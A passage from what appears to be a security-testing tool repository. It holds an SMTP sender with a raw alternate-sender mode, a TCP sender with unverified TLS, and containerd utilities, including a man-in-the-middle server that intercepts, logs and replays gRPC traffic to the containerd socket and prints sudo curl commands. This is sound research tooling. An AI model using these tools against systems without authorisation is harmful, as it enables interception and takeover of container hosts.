| if opts.raw: 232 | sendraw((host, int(port)), sender, ','.join(recipients), subject, nheaders=smtpheaders, bheaders=bodyheaders, textbody=body, afrom=alt_sender, data=fd, debug=opts.debug) 233 | else: 234 | 235 | msg = MIMEMultipart() 236 | msg['Message-ID'] = utils.make_msgid() 237 | msg['Subject'] = subject 238 | msg['from'] = sender 239 | msg['To'] = sender 240 | 241 | 242 | # giving myself the option to add other encoders later on if desired 243 | encoder = lambda x: x.encode('base64') 244 | encoder.__doc__ = 'base64' 245 | 246 | #charset = 'UTF-8' 247 | charset = 'us-ascii' 248 | 249 | if fd: # bodyfile 250 | maintype, subtype = detect_filetype(opts.bodyfile) 251 | needEncode = False 252 | try: 253 | tdata = fd.encode('ascii') 254 | except: 255 | needEncode = True 256 | if opts.bodyencode or needEncode: 257 | body = MIMEBase(maintype, subtype, charset=charset) 258 | body.set_payload(encoder(fd)) 259 | body.add_header('Content-Transfer-Encoding', encoder.__doc__) 260 | else: 261 | body = MIMEText(tdata, _subtype=subtype, _charset=charset) 262 | msg.attach(body) 263 | elif opts.body: 264 | if opts.bodyencode: 265 | dd = 'text/html' if '' in opts.body else 'text/plain' 266 | maintype, subtype = dd.split('/', 1) 267 | body = MIMEBase(maintype, subtype, charset=charset) 268 | body.set_payload(encoder(opts.body)) 269 | body.add_header('Content-Transfer-Encoding', encoder.__doc__) 270 | msg.attach(body) 271 | else: 272 | msg.preamble = opts.body 273 | 274 | 275 | 276 | if opts.attachments: 277 | # check for option to not detect filetype 278 | for filename in opts.attachments.replace(' ', '').split(','): 279 | attachment = MIMEBase('application', 'octet-stream', charset=charset) 280 | attachment.set_payload(open(filename, 'rb').read()) 281 | attachment.add_header('Content-Transfer-Encoding', encoder.__doc__) 282 | #encoders.encode_base64(attachment) 283 | base_filename = filename.split(os.path.sep)[-1] 284 | attachment.add_header('Content-Disposition', 'attachment', filename=base_filename) 285 | msg.attach(attachment) 286 | 287 | 288 | smtpi = smtplib.SMTP(host, port) 289 | smtpi.sendmail(opts.sender, recipients, msg.as_string()) 290 | smtpi.quit() 291 | -------------------------------------------------------------------------------- /clients/tcp_sender.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import ssl 3 | 4 | def send_receive(host: str, port: int, filename: str, wrap_ssl: bool=False, sni_hostname: str=None, timeout: int=5): 5 | '''Connect to host on given TCP port, with optional ssl wrapping, send data from provided filename, and return response''' 6 | client_socket = socket.socket() 7 | client_socket.settimeout(timeout) 8 | 9 | if wrap_ssl: 10 | #client_socket = ssl.wrap_socket(client_socket, ssl_version=ssl.PROTOCOL_TLSv1_2) 11 | #context = ssl._create_unverified_context(protocol=ssl.PROTOCOL_TLSv1_2) 12 | context = ssl._create_unverified_context() 13 | if sni_hostname: 14 | client_socket = context.wrap_socket(client_socket, server_hostname=sni_hostname) 15 | else: 16 | client_socket = context.wrap_socket(client_socket) 17 | 18 | 19 | client_socket.connect((host, port)) 20 | client_socket.send(open(filename, 'rb').read()) 21 | out = b'' 22 | moar = True 23 | while moar: 24 | try: 25 | d = client_socket.recv(1024) 26 | if len(d) < 1: 27 | moar = False 28 | out += d 29 | except (TimeoutError, ConnectionResetError): 30 | moar = False 31 | except: 32 | break 33 | 34 | client_socket.close() 35 | return out 36 | 37 | -------------------------------------------------------------------------------- /commands/all_strings.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # wrapper for srch_strings string search tool from the sleuth kit to return strings of all known character types 3 | # extension of code from here http://jessekornblum.livejournal.com/294081.html 4 | 5 | SRCH_STRINGS=/opt/local/bin/srch_strings 6 | FLAGS=-a 7 | 8 | for FILE in "$@" 9 | do 10 | $SRCH_STRINGS $FLAGS -e s "$FILE" 11 | $SRCH_STRINGS $FLAGS -e S "$FILE" 12 | $SRCH_STRINGS $FLAGS -e l "$FILE" 13 | $SRCH_STRINGS $FLAGS -e b "$FILE" 14 | $SRCH_STRINGS $FLAGS -e B "$FILE" 15 | $SRCH_STRINGS $FLAGS -e L "$FILE" 16 | done 17 | -------------------------------------------------------------------------------- /containerd/README.md: -------------------------------------------------------------------------------- 1 | A few tools for understanding and interacting with the containerd socket: 2 | 3 | * echoer.py - reads a binary file and produces an "echo" command that will send the file contents to STDOUT to pipe into other tools in limted toolset envirvonments 4 | * http2_socket_client.py - implementation of a HTTP2 client in Python that can communicate via a named pipe to facilitate programmatic comms to containerd socket 5 | * protobuf_parser.py - protobuf parser to allow exploring of .proto file defined services and encoding/decoding of protobuf messages 6 | * socket_grpc_mitm_server.py - allows mitm of traffic between a containerd admin client like ctr and the containerd daemon by creating a listening named pipe that will forward and log all traffic to the actual socket 7 | 8 | 9 | -------------------------------------------------------------------------------- /containerd/echoer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | if len(sys.argv) < 2: 5 | print('Provide filename to read') 6 | sys.exit(1) 7 | 8 | 9 | try: 10 | data = open(sys.argv[1], 'rb').read() 11 | print('echo -ne "{}"'.format(''.join(["\\x{:02x}".format(a) for a in data]))) 12 | except Exception as e: 13 | print(str(e)) 14 | 15 | 16 | -------------------------------------------------------------------------------- /containerd/http2_socket_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | 4 | 5 | import collections 6 | if not hasattr(collections, 'MutableSet'): 7 | import collections.abc 8 | collections.MutableSet = collections.abc.MutableSet 9 | 10 | if not hasattr(collections, 'MutableMapping'): 11 | import collections.abc 12 | collections.MutableMapping = collections.abc.MutableMapping 13 | 14 | 15 | import h2.connection 16 | import h2.events 17 | 18 | 19 | def http2_client(address, method, path, authority, headers, senddata): 20 | max_frame_size = 16384 21 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 22 | sock.connect(address) 23 | 24 | c = h2.connection.H2Connection() 25 | c.initiate_connection() 26 | sock.sendall(c.data_to_send()) 27 | 28 | base_headers = [ 29 | (':method', method), 30 | (':path', path), 31 | (':authority', authority), 32 | (':scheme', 'http'), 33 | ] 34 | if isinstance(headers, dict): 35 | base_headers += [(a[0].lower(), a[1]) for a in headers.items()] 36 | elif isinstance(headers, list): 37 | base_headers += headers 38 | 39 | if senddata and not 'content-length' in [a[0] for a in base_headers]: 40 | base_headers += [('content-length', f'{len(senddata)}')] 41 | 42 | c.send_headers(1, base_headers, end_stream=bool(not senddata)) 43 | if senddata: 44 | segments = [senddata[a:a+max_frame_size] for a in range(0, len(senddata), max_frame_size)] 45 | for counter in range(0, len(segments)): 46 | c.send_data(stream_id=1, 47 | data=segments[counter], 48 | end_stream=counter==len(segments)-1) 49 | sock.sendall(c.data_to_send()) 50 | 51 | body = b'' 52 | response_stream_ended = False 53 | while not response_stream_ended: 54 | # read raw data from the socket 55 | data = sock.recv(65536 * 1024) 56 | if not data: 57 | break 58 | 59 | response_headers = [] 60 | response_trailers = [] 61 | # feed raw data into h2, and process resulting events 62 | events = c.receive_data(data) 63 | for event in events: 64 | if isinstance(event, h2.events.ResponseReceived): 65 | response_headers += event.headers 66 | if isinstance(event, h2.events.DataReceived): 67 | # update flow control so the server doesn't starve us 68 | c.acknowledge_received_data(event.flow_controlled_length, event.stream_id) 69 | # more response body data received 70 | body += event.data 71 | if isinstance(event, h2.events.TrailersReceived): 72 | response_trailers += event.headers 73 | if isinstance(event, h2.events.StreamEnded): 74 | # response body completed, let's exit the loop 75 | response_stream_ended = True 76 | break 77 | # send any pending data to the server 78 | sock.sendall(c.data_to_send()) 79 | 80 | # tell the server we are closing the h2 connection 81 | c.close_connection() 82 | sock.sendall(c.data_to_send()) 83 | 84 | # close the socket 85 | sock.close() 86 | return {'body': body, 'headers': response_headers, 'trailers': response_trailers} 87 | 88 | 89 | socket_path = '/tmp/http2' 90 | socket_path = '/run/containerd/containerd.sock' 91 | data = b'\x00\x00\x00\x00\x00' 92 | #response = http2_client(socket_path, 'POST', '/test', 'localhost', {'extra': 'value', 'another': 'one'}, data) 93 | response = http2_client(socket_path, 'POST', '/containerd.services.version.v1.Version/Version', 'localhost', {'content-type': 'application/grpc', 'grpc-accept-encoding': 'gzip'}, data) 94 | print(response) 95 | -------------------------------------------------------------------------------- /containerd/protobuf_parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from importlib.machinery import SourceFileLoader 4 | import sys 5 | import argparse 6 | import json 7 | import os 8 | 9 | class MyParser(argparse.ArgumentParser): 10 | def error(self, message): 11 | sys.stderr.write('error: %s\n' % message) 12 | self.print_help() 13 | sys.exit(2) 14 | 15 | 16 | def jsonify(value): 17 | if isinstance(value, bool): 18 | return value 19 | if isinstance(value, str): 20 | return value 21 | if isinstance(value, int): 22 | return value 23 | if isinstance(value, list): 24 | return value 25 | if isinstance(value, dict): 26 | return value 27 | if isinstance(value, bytes): 28 | try: 29 | return json.loads(value.decode()) 30 | except: 31 | try: 32 | return value.decode() 33 | except: 34 | return str(value) 35 | if 'RepeatedCompositeContainer' in str(type(value)): 36 | return [{a[0].name: jsonify(a[1]) for a in b.ListFields()} for b in value] 37 | if 'RepeatedScalarContainer' in str(type(value)): 38 | return [jsonify(a) for a in value] 39 | if 'ListFields' in dir(value): 40 | return {a[0].name: jsonify(a[1]) for a in value.ListFields()} 41 | elif 'items' in dir(value): 42 | return dict(value.items()) 43 | return value 44 | 45 | def parse_dependency_package_name(dependencyref): 46 | return '_dot_'.join(dependencyref.name.split('/')).replace('.proto', '') + '__pb2' 47 | 48 | 49 | def parse_field(field): 50 | lookup = {getattr(field, a): a for a in dir(field) if a.startswith('CPP')} 51 | complex_type = field.message_type.name if field.message_type else None 52 | cpp_type = lookup.get(field.cpp_type, 'CPPTYPE_NONE').split('_', 1)[-1].lower() 53 | typestring = complex_type if complex_type else cpp_type 54 | return {'type' : typestring } 55 | 56 | 57 | def parse_service(service): 58 | mp = lambda x: {'input_type': x.input_type.name, 'output_type': x.output_type.name} if x else 'None' 59 | methods = {a[0]: mp(a[1]) for a in service.methods_by_name.items()} 60 | return {'methods': methods} 61 | 62 | def parse_type(messagetype): 63 | fields = {a[0]: parse_field(a[1]) for a in messagetype.fields_by_name.items()} 64 | return {'fields': fields} 65 | 66 | 67 | def printstring_messagetypes(messagetypes): 68 | out = '' 69 | for name, messagetype in messagetypes.items(): 70 | out += f'* {name}\n' 71 | for field, fielddata in messagetype.get('fields').items(): 72 | out += ' {} - {}\n'.format(field, fielddata.get('type')) 73 | return out 74 | 75 | 76 | def printstring_messagetypes_complex(messagetypes, dependanttypes): 77 | lookup = {**messagetypes, **dependanttypes} 78 | out = '' 79 | for name, messagetype in messagetypes.items(): 80 | out += f'* {name}\n' 81 | out += ' Fields:\n' 82 | for field, fielddata in messagetype.get('fields').items(): 83 | out += ' {} - {}\n'.format(field, fielddata.get('type')) 84 | 85 | out += '\n Rough JSON example (might need tweaking): \n\n' 86 | fl = len(messagetype.get('fields')) 87 | if fl == 0: 88 | out += '\n==================================\n' 89 | continue 90 | cl = 0 91 | out += '{\n' 92 | for field, fielddata in messagetype.get('fields').items(): 93 | fd = fielddata.get('type') 94 | if fd in lookup: 95 | fd = json.dumps({a[0]:a[1].get('type') for a in lookup[fd].get('fields').items()}) 96 | if fd == 'string': 97 | fd = '"string"' 98 | out += ' "{}": {}'.format(field, fd) 99 | cl +=1 100 | if cl < fl: 101 | out += ',' 102 | out += '\n' 103 | 104 | out += '}\n\n' 105 | out += '==================================\n' 106 | return out 107 | 108 | 109 | def printstring_services(services, package): 110 | out = '' 111 | for name, service in services.items(): 112 | for method, method_details in service.get('methods').items(): 113 | out += f'* /{package}.{name}/{method}\n' 114 | out += ' Input: {}\n'.format(method_details.get('input_type')) 115 | out += ' Output: {}\n'.format(method_details.get('output_type')) 116 | return out 117 | 118 | 119 | 120 | def encode_from_object(data, pb_object, messagetype: str, parent=True, parentobject=None): 121 | kv_assign_types = ['google._upb._message.ScalarMapContainer'] 122 | list_assign_types = ['google._upb._message.RepeatedCompositeContainer', 'google._upb._message.RepeatedScalarContainer'] 123 | o_inst = getattr(pb_object, messagetype)() 124 | field_lookup = {a[0]: parse_field(a[1]).get('type') for a in o_inst.DESCRIPTOR.fields_by_name.items()} 125 | native_types = [a.lower().split('_')[-1] for a in dir([a[1] for a in o_inst.DESCRIPTOR.fields_by_name.items()][0]) if a.startswith('CPP')] 126 | child_types = o_inst.DESCRIPTOR.nested_types_by_name.keys() 127 | if parentobject: 128 | dependant_types = {b : parse_dependency_package_name(a) for a in parentobject.DESCRIPTOR.dependencies for b in a.message_types_by_name.keys()} 129 | primary_types = [a for a in parentobject.DESCRIPTOR.message_types_by_name.keys()] 130 | else: 131 | dependant_types = {b : parse_dependency_package_name(a) for a in protobuf_module.DESCRIPTOR.dependencies for b in a.message_types_by_name.keys()} 132 | primary_types = [a for a in protobuf_module.DESCRIPTOR.message_types_by_name.keys()] 133 | 134 | 135 | if isinstance(data, dict): 136 | for key, value in data.items(): 137 | if str(type(getattr(o_inst, key))).split("'")[1] in kv_assign_types: 138 | if isinstance(value, list): 139 | for entry in value: 140 | if 'key' and 'value' in entry: 141 | getattr(o_inst, key)[entry['key']] = entry['value'] 142 | else: 143 | raise Exception(f'Expected "key" and "value" keys in input: {entry}') 144 | elif isinstance(value, dict): 145 | for k, v in value.items(): 146 | getattr(o_inst, key)[k] = v 147 | else: 148 | if 'key' and 'value' in value: 149 | getattr(o_inst, key)[value['key']] = value['value'] 150 | else: 151 | raise Exception(f'Expected "key" and "value" keys in input: {value}') 152 | elif str(type(getattr(o_inst, key))).split("'")[1] in list_assign_types: 153 | for entry in value: 154 | if field_lookup.get(key) in child_types: 155 | newentry = encode_from_object(entry, o_inst, field_lookup.get(key), parent=False, parentobject=pb_object) 156 | elif field_lookup.get(key) in primary_types: 157 | newentry = encode_from_object(entry, pb_object, field_lookup.get(key), parent=False) 158 | elif field_lookup.get(key) in dependant_types: 159 | if parentobject: 160 | dependantobject = getattr(parentobject, dependant_types.get(field_lookup.get(key))) 161 | else: 162 | dependantobject = getattr(pb_object, dependant_types.get(field_lookup.get(key))) 163 | newentry = encode_from_object(entry, dependantobject, field_lookup.get(key), parent=False) 164 | elif field_lookup.get(key) in native_types: 165 | if field_lookup.get(key) == 'string' and not isinstance(entry, str): 166 | entry = json.dumps(entry) 167 | newentry = entry 168 | getattr(o_inst, key).append(newentry) 169 | elif field_lookup.get(key) in native_types: 170 | if field_lookup.get(key) == 'string' and not isinstance(value, str): 171 | value = json.dumps(value) 172 | try: 173 | setattr(o_inst, key, value) 174 | except TypeError as e: 175 | if 'expected bytes' in str(e): 176 | setattr(o_inst, key, value.encode()) 177 | elif field_lookup.get(key) in child_types: 178 | newvalue = encode_from_object(value, o_inst, field_lookup.get(key), parent=False, parentobject=pb_object) 179 | if 'CopyFrom' in dir(getattr(o_inst, key)): 180 | getattr(o_inst, key).CopyFrom(newvalue) 181 | elif 'MergeFrom' in dir(getattr(o_inst, key)): 182 | getattr(o_inst, key).MergeFrom(newvalue) 183 | elif field_lookup.get(key) in primary_types: 184 | newvalue = encode_from_object(value, pb_object, field_lookup.get(key), parent=False) 185 | getattr(o_inst, key).CopyFrom(newvalue) 186 | elif field_lookup.get(key) in dependant_types: 187 | if parentobject: 188 | dependantobject = getattr(parentobject, dependant_types.get(field_lookup.get(key))) 189 | else: 190 | dependantobject = getattr(pb_object, dependant_types.get(field_lookup.get(key))) 191 | newvalue = encode_from_object(value, dependantobject, field_lookup.get(key), parent=False) 192 | getattr(o_inst, key).CopyFrom(newvalue) 193 | if isinstance(data, list): 194 | 195 | o_inst = data 196 | 197 | if parent: 198 | return o_inst.SerializeToString() 199 | else: 200 | return o_inst 201 | 202 | 203 | 204 | if __name__ == "__main__": 205 | parser = MyParser() 206 | parser.epilog = 'Generate Python module to use for decoding definitions using the protoc tool like so: protoc --python_out=. ' 207 | parser.description = 'Protobuf decoder using Python modules generated using the protoc command line tool' 208 | parser.add_argument('-m', '--module', type=str, required=True, help='protoc generated Python module file <*_pb2.py> . REQUIRED.') 209 | parser.add_argument('-d', '--data', type=str, default=None, help='Data file to parse as gRPC protobuf content') 210 | parser.add_argument('-t', '--type', type=str, default=None, help='Type definition from the protobuf file to use when parsing') 211 | parser.add_argument('-o', '--output', type=str, default=None, help='Output file. STDOUT will be used if not specified') 212 | parser.add_argument('-i', '--input', type=str, default=None, help='Input file in JSON format') 213 | parser.add_argument('-j', '--jsonout', action='store_true', help='Attempt to output in JSON format') 214 | parser.add_argument('-x', '--skip_indent', action='store_true', help='Dont indent JSON output') 215 | args = parser.parse_args() 216 | 217 | 218 | 219 | try: 220 | base = os.path.split(args.module)[-1] 221 | protobuf_module = SourceFileLoader('.'.join(base.split('.')[:-1]), args.module).load_module() 222 | except Exception as e: 223 | print(str(e)) 224 | sys.exit(1) 225 | 226 | message_types = [a for a in protobuf_module.DESCRIPTOR.message_types_by_name] 227 | allowed = ','.join(message_types) 228 | 229 | if args.data and not args.type: 230 | print('Provide a type for parsing of the response data file using -t') 231 | print(f'Available types include: {allowed}') 232 | sys.exit(1) 233 | 234 | 235 | if args.type and not args.type in message_types: 236 | print(f'Specified type {args.type} is not in allowed list: {allowed}') 237 | 238 | 239 | if args.output and args.input: 240 | if not args.type: 241 | print(f'No message type specified, select from the following list: {allowed}') 242 | sys.exit(1) 243 | try: 244 | jsondata = json.loads(open(args.input).read()) 245 | encoded_data = encode_from_object(jsondata, protobuf_module, args.type) 246 | # need to add gRPC Length-Prefixed-Message header with 5 leading bytes with BE encoded size 247 | header = int(len(encoded_data)).to_bytes(5, 'big') 248 | open(args.output, 'wb').write(header + encoded_data) 249 | print(f'Written to {args.output}') 250 | sys.exit(0) 251 | except Exception as e: 252 | print(str(e)) 253 | sys.exit(1) 254 | 255 | 256 | if args.data and args.type: 257 | try: 258 | data = open(args.data, 'rb').read() 259 | obj = getattr(protobuf_module, args.type)() 260 | # strip off gRPC Length-Prefixed-Message header and hope message not bigger than ~ 1099511627775 261 | obj.ParseFromString(data[5:]) 262 | if args.jsonout: 263 | if args.skip_indent: 264 | outputcontent = json.dumps({a[0].name: jsonify(a[1]) for a in obj.ListFields()}) 265 | else: 266 | outputcontent = json.dumps({a[0].name: jsonify(a[1]) for a in obj.ListFields()}, indent=4) 267 | else: 268 | outputcontent = str(obj) 269 | if args.output: 270 | open(args.output, 'w').write(outputcontent) 271 | else: 272 | print(outputcontent) 273 | 274 | sys.exit(0) 275 | except Exception as e: 276 | print(str(e)) 277 | sys.exit(1) 278 | 279 | else: 280 | package = protobuf_module.DESCRIPTOR.package 281 | deps = [a.name for a in protobuf_module.DESCRIPTOR.dependencies] 282 | message_types = {a[0]: parse_type(a[1]) for a in protobuf_module.DESCRIPTOR.message_types_by_name.items()} 283 | dependant_types = {b[0]: parse_type(b[1]) for a in protobuf_module.DESCRIPTOR.dependencies for b in a.message_types_by_name.items()} 284 | services = {a[0]: parse_service(a[1]) for a in protobuf_module.DESCRIPTOR.services_by_name.items()} 285 | #print('Dependencies:\n' + '\n'.join(['* ' + a for a in deps])) 286 | print('Services:\n' + printstring_services(services, package)) 287 | print('==================================') 288 | #print('\nMessage Types:\n' + printstring_messagetypes(message_types)) 289 | print('\nDependant Message Types:\n' + printstring_messagetypes(dependant_types)) 290 | print('==================================') 291 | print('\nMessage Types:\n' + printstring_messagetypes_complex(message_types, dependant_types)) 292 | 293 | 294 | 295 | 296 | 297 | 298 | -------------------------------------------------------------------------------- /containerd/socket_grpc_mitm_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket 3 | import json 4 | import os 5 | import sys 6 | 7 | # installing hyper can bork h2 so need to do this monkey patching with loads 8 | import collections 9 | if not hasattr(collections, 'MutableSet'): 10 | import collections.abc 11 | collections.MutableSet = collections.abc.MutableSet 12 | 13 | if not hasattr(collections, 'MutableMapping'): 14 | import collections.abc 15 | collections.MutableMapping = collections.abc.MutableMapping 16 | 17 | import h2.connection 18 | import h2.events 19 | import h2.config 20 | 21 | if not len(sys.argv) > 1: 22 | print('Provide socket path to listen on as parameter 1') 23 | sys.exit(1) 24 | 25 | socket_path = sys.argv[1] 26 | 27 | 28 | 29 | 30 | max_frame_size = 16384 31 | 32 | # configure whether we try and replay recevied requests 33 | # TODO expose all of this to command line config 34 | replay = { 35 | 'replay_requests' : True, 36 | 'destination': '/run/containerd/containerd.sock', 37 | 'verify_grpc': False 38 | } 39 | 40 | # basic config for responding to given requests 41 | url_map = { 42 | '/containerd.services.introspection.v1.Introspection/Server': {'filecontent': '/tmp/int', 'content-type': 'application/grpc'}, 43 | '/containerd.services.containers.v1.Containers/Get': {'filecontent': '/tmp/cg', 'content-type': 'application/grpc'}, 44 | '/containerd.services.tasks.v1.Tasks/Get': {'filecontent': '/tmp/tg', 'content-type': 'application/grpc'}, 45 | '/containerd.services.tasks.v1.Tasks/Exec': {'filecontent': '/tmp/empty', 'content-type': 'application/grpc'}, 46 | '/containerd.services.images.v1.Images/Get': {'filecontent': '/tmp/imagegetresponse.bin', 'content-type': 'application/grpc'}, 47 | '/containerd.services.namespaces.v1.Namespaces/Get': {'filecontent': '/tmp/namespacegetresponse.bin', 'content-type': 'application/grpc'}, 48 | '/containerd.services.content.v1.Content/Info': [ 49 | {'data': b'k8s.io', 'filecontent': '/tmp/empty', 'content-type': 'application/grpc', 'trailers': [('grpc-status', '3'), ('grpc-message', '"k8s.io" failed validation')]}, 50 | {'data': b'sha256', 'filecontent': '/tmp/contentinfo2.bin', 'content-type': 'application/grpc'} 51 | ], 52 | '/containerd.services.content.v1.Content/Read': {'filecontent': '/tmp/readresponse.bin', 'content-type': 'application/grpc'}, 53 | } 54 | 55 | 56 | # remove the socket file if it already exists 57 | try: 58 | os.unlink(socket_path) 59 | except OSError: 60 | if os.path.exists(socket_path): 61 | raise 62 | 63 | 64 | def build_curl_command(primitives, headers, data, socket_name=replay['destination'], sudo=True): 65 | data_pipe = '' 66 | pipe_trail = '' 67 | sudo_ins = '' 68 | url = primitives.get('url', None) 69 | method = primitives.get('method', None) 70 | c_headers = ' '.join([' -H "{}: {}"'.format(a[0], a[1]) for a in headers.items()]) 71 | if data: 72 | data_pipe = 'echo -ne "{}" | '.format(''.join(["\\x{:02x}".format(a) for a in data])) 73 | pipe_trail = '--data-binary @- --output FILENAME' 74 | if socket_name: 75 | socket_addr = f'--unix-socket {socket_name}' 76 | if sudo: 77 | sudo_ins = 'sudo ' 78 | if url and method: 79 | return f'{data_pipe}{sudo_ins}curl -s -v --http2-prior-knowledge {socket_addr} -X {method} {c_headers} {url} {pipe_trail}' 80 | else: 81 | return 'Could not create curl command' 82 | 83 | 84 | def parse_headers(event): 85 | return {a[0]:a[1] for a in event.headers if not a[0].startswith(':')} 86 | 87 | def parse_primitives(event): 88 | prim = {a[0]:a[1] for a in event.headers if a[0].startswith(':')} 89 | try: 90 | url = '{}://{}{}'.format(prim[':scheme'], prim[':authority'], prim[':path']) 91 | return {'url' : url, 'method': prim[':method']} 92 | except Exception as e: 93 | print(f'Exception parsing primitives from event: {str(e)}') 94 | return {} 95 | 96 | 97 | def send_response(conn, event, data=b''): 98 | stream_id = event.stream_id 99 | event_headers = dict(event.headers) 100 | path = event_headers.get(':path') 101 | method = event_headers.get(':method') 102 | content_type = 'application/json' 103 | end_stream = True 104 | 105 | response_data = json.dumps(event_headers).encode('utf-8') 106 | mapping = '' 107 | replay_response = {} 108 | if replay.get('replay_requests', False): 109 | extra_headers = {a[0]: a[1] for a in event_headers.items() if not a[0].startswith(':')} 110 | try: 111 | print('Trying to replay request...') 112 | #import ipdb 113 | #ipdb.set_trace() 114 | replay_message = True 115 | if replay.get('verify_grpc'): 116 | if int.from_bytes(data[:5], 'big') != len(data) -5: 117 | replay_message = False 118 | else: 119 | print('Message failed gRPC verification, will not replay') 120 | if replay_message: 121 | replay_response = http2_client(replay.get('destination'), method, path, event_headers.get(':authority'), extra_headers, data) 122 | print(f'Replay successful, response: {str(replay_response)}') 123 | except Exception as e: 124 | print(f'Error when trying to replay request: {str(e)}') 125 | elif path in url_map: 126 | if isinstance(url_map[path], dict): 127 | mapping = url_map[path] 128 | elif isinstance(url_map[path], list): 129 | for mapentry in url_map[path]: 130 | if mapentry.get('data') in data: 131 | print('matched entry') 132 | print(mapentry.get('data')) 133 | mapping = mapentry 134 | 135 | if mapping: 136 | content_type = mapping.get('content-type') 137 | try: 138 | fn = mapping.get('filecontent') 139 | response_data = open(fn, 'rb').read() 140 | print(f'Sending content from file {fn} in response') 141 | except Exception: 142 | pass 143 | 144 | if content_type == 'application/grpc': 145 | end_stream = False 146 | if 'trailers' in mapping: 147 | trailers = mapping['trailers'] 148 | else: 149 | trailers = [('grpc-status', '0'),('grpc-message', '')] 150 | 151 | 152 | headers=[ 153 | (':status', '200'), 154 | ('server', 'debug-http2-server/1.0'), 155 | ('content-length', str(len(response_data))), 156 | ('content-type', content_type), 157 | ] 158 | 159 | trailers = [] 160 | 161 | if replay_response: 162 | if replay_response.get('headers'): 163 | headers = replay_response.get('headers') 164 | #if 'content-type' in [a[0] for a in headers]: 165 | # content_type = [a[1] for a in headers if a[0] == 'content-type'][0] 166 | if replay_response.get('trailers'): 167 | trailers = replay_response.get('trailers') 168 | end_stream = False 169 | if replay_response.get('body'): 170 | response_data = replay_response.get('body') 171 | 172 | 173 | 174 | conn.send_headers( 175 | stream_id=stream_id, 176 | headers=headers, 177 | ) 178 | 179 | segments = [response_data[a:a+max_frame_size] for a in range(0, len(response_data), max_frame_size)] 180 | for counter in range(0, len(segments)): 181 | conn.send_data( 182 | stream_id=stream_id, 183 | data=segments[counter], 184 | end_stream=(counter==len(segments)-1) and end_stream 185 | ) 186 | 187 | if trailers: 188 | conn.send_headers( 189 | stream_id=stream_id, 190 | headers=trailers, 191 | end_stream=True 192 | ) 193 | 194 | 195 | 196 | def http2_client(address, method, path, authority, headers, senddata): 197 | max_frame_size = 16384 198 | sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) 199 | sock.connect(address) 200 | 201 | c = h2.connection.H2Connection() 202 | c.initiate_connection() 203 | sock.sendall(c.data_to_send()) 204 | 205 | base_headers = [ 206 | (':method', method), 207 | (':path', path), 208 | (':authority', authority), 209 | (':scheme', 'http'), 210 | ] 211 | if isinstance(headers, dict): 212 | base_headers += [(a[0].lower(), a[1]) for a in headers.items()] 213 | elif isinstance(headers, list): 214 | base_headers += headers 215 | 216 | if senddata and not 'content-length' in [a[0] for a in base_headers]: 217 | base_headers += [('content-length', f'{len(senddata)}')] 218 | 219 | c.send_headers(1, base_headers, end_stream=bool(not senddata)) 220 | if senddata: 221 | segments = [senddata[a:a+max_frame_size] for a in range(0, len(senddata), max_frame_size)] 222 | for counter in range(0, len(segments)): 223 | c.send_data(stream_id=1, 224 | data=segments[counter], 225 | end_stream=counter==len(segments)-1) 226 | sock.sendall(c.data_to_send()) 227 | 228 | body = b'' 229 | response_stream_ended = False 230 | while not response_stream_ended: 231 | # read raw data from the socket 232 | data = sock.recv(65536 * 1024) 233 | if not data: 234 | break 235 | 236 | response_headers = [] 237 | response_trailers = [] 238 | # feed raw data into h2, and process resulting events 239 | events = c.receive_data(data) 240 | for event in events: 241 | if isinstance(event, h2.events.ResponseReceived): 242 | response_headers += event.headers 243 | if isinstance(event, h2.events.DataReceived): 244 | # update flow control so the server doesn't starve us 245 | c.acknowledge_received_data(event.flow_controlled_length, event.stream_id) 246 | # more response body data received 247 | body += event.data 248 | if isinstance(event, h2.events.TrailersReceived): 249 | response_trailers += event.headers 250 | if isinstance(event, h2.events.StreamEnded): 251 | # response body completed, let's exit the loop 252 | response_stream_ended = True 253 | break 254 | # send any pending data to the server 255 | sock.sendall(c.data_to_send()) 256 | 257 | # tell the server we are closing the h2 connection 258 | c.close_connection() 259 | sock.sendall(c.data_to_send()) 260 | 261 | # close the socket 262 | sock.close() 263 | return {'body': body, 'headers': response_headers, 'trailers': response_trailers} 264 | 265 | 266 | 267 | 268 | def handle(sock): 269 | received_info = {} 270 | #received_data = None 271 | config = h2.config.H2Configuration(client_side=False) 272 | conn = h2.connection.H2Connection(config=config) 273 | conn.initiate_connection() 274 | sock.sendall(conn.data_to_send()) 275 | 276 | 277 | while True: 278 | try: 279 | data = sock.recv(65536 * 1024) 280 | print('===================================') 281 | 282 | if not data: 283 | break 284 | 285 | events = conn.receive_data(data) 286 | print('Data received') 287 | #print(events) 288 | recent_stream = None 289 | receive_event = b'' 290 | received_headers = {} 291 | request_primitives = {} 292 | received_data = b'' 293 | recent_stream = None 294 | for event in events: 295 | if bool(getattr(event, 'stream_id', False)): 296 | recent_stream = event.stream_id 297 | if not event.stream_id in received_info: 298 | received_info[event.stream_id] = {'processed': False, 'data': b''} 299 | if isinstance(event, h2.events.RequestReceived): 300 | print(f'Receive event: {str(event)}') 301 | if not 'receive' in received_info[event.stream_id]: 302 | received_info[event.stream_id]['receive'] = event 303 | received_info[event.stream_id]['processed'] = False 304 | #receive_event = event 305 | #send_response(conn, event) 306 | received_headers = parse_headers(event) 307 | request_primitives = parse_primitives(event) 308 | if isinstance(event, h2.events.DataReceived): 309 | received_data = event.data 310 | print(f'Event data received: {str(event.data)}') 311 | received_info[event.stream_id]['data'] += event.data 312 | received_info[event.stream_id]['processed'] = False 313 | 314 | 315 | for stream in received_info: 316 | if not received_info[stream].get('processed') and received_info[stream].get('receive') and received_info[stream].get('data'): 317 | send_response(conn, received_info[event.stream_id].get('receive'), data=received_info[event.stream_id].get('data')) 318 | socket_name = (lambda x: x if x.startswith('/') else '')(sock.getsockname()) 319 | socket_name = replay['destination'] 320 | curl_command = build_curl_command(parse_primitives(received_info[event.stream_id].get('receive')), parse_headers(received_info[event.stream_id].get('receive')), received_info[event.stream_id].get('data'), socket_name) 321 | print('Curl command to replicate received request: ' + curl_command) 322 | 